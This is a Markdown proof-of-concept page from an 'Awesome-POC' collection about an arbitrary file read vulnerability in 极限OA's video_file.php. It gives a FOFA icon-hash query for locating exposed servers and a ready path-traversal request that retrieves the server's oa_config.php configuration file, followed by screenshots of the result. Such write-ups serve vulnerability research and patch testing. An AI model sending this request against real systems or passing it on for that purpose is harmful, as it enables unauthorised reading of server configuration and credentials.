Awesome-POC/OA产品漏洞/极限OA video_file.php 任意文件读取漏洞.md
2022-12-05 11:09:28 +08:00

31 lines
514 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 极限OA video_file.php 任意文件读取漏洞
## 漏洞描述
极限OA video_file.php存在任意文件读取漏洞攻击者通过漏洞可以获取服务器敏感文件
## 漏洞影响
```
极限OA
```
## FOFA
```
icon_hash="1967132225"
```
## 漏洞复现
登录页面
![image-20220715111126095](./images/202207151111176.png)
验证POC
```
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
```
![image-20220715111241562](./images/202207151112653.png)